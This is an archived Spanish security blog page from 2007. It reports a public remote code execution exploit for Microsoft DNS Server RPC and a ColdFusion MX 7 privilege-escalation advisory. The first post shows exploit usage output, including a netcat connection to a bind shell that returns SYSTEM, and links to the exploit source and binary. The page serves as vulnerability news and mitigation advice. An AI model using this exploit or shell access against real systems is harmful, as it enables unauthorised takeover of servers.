Visitas: Creative Commons License
Cuaderno de OsCaR :: inSiD3 » 2007 » Abril » 17

Cuaderno de OsCaR :: inSiD3

Participa en el Blog enviando EBL oscar y tu mensaje al 7505 [0,90 €+iva]

17 Abril 2007

Explotando actualizaciones dinámicas en Microsoft DNS Server - Remote Code execution Exploit

Guardado en: General, Seguridad, Programacion, Windows — oscarinside @ 5:22

Andrés Tarasco y Mario Ballano han publicado un exploit para una vulnerabilidad remota del servicio DNS de Microsoft que permitiría a un usuario la ejecucion remota de codigo con privilegios de SYSTEM.

Al contrario que los reportes iniciales de Microsoft, han notificado de que su exploit es capaz de atacar un sistema a través del puerto 445 por lo que dicho puerto debe ser filtrado en el firewall hasta que el parche definitivo sea publicado.

>> Ejemplo del uso del exploit:

D:\DNSTEST>dnstest.exe 192.168.1.7
——————————————————-
Microsoft Dns Server local & remote RPC Exploit code (port 445)
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 server SP4 and Windows 2003 SP2 (Spanish)
——————————————————-

[+] Trying to fingerprint target.. 05 02
[+] Remote Host identified as Windows 2003
[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_np:192.168.1.7[\\pipe\\dnsserver]
[+] RpcBindingFromStringBinding returned 0×0
[+] Calling remote procedure DnssrvOperation()
[+] Now try to connect to port 4444

D:\DNSTEST>nc 192.168.1.7 4444
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>whoami
nt authority\system

:: Fuente: 514.es && 48Bits

:: El código fuente del exploit y el analisis del mismo lo podeis Descargar aqui
:: Exploit compilado Win32 aqui
:: Análisis de la vulnerabilidad aqui

Escalada de privilegios a través de ficheros no especificados en Adobe ColdFusion MX 7.x

Guardado en: General, Seguridad — oscarinside @ 1:32

Se ha anunciado la existencia de una vulnerabilidad en Adobe ColdFusion MX 7, que podría ser empleada por atacantes locales para conseguir elevar sus privilegios en el sistema.

El problema reside en la aplicación de permisos inseguros a determinados archivos y directorios. Un atacante local podría emplearlo para elevar sus privilegios en el siguiente reinicio de ColdFusion al reemplazar o editar los archivos afectados.
:: Fuente: Hispasec

Powered by WordPress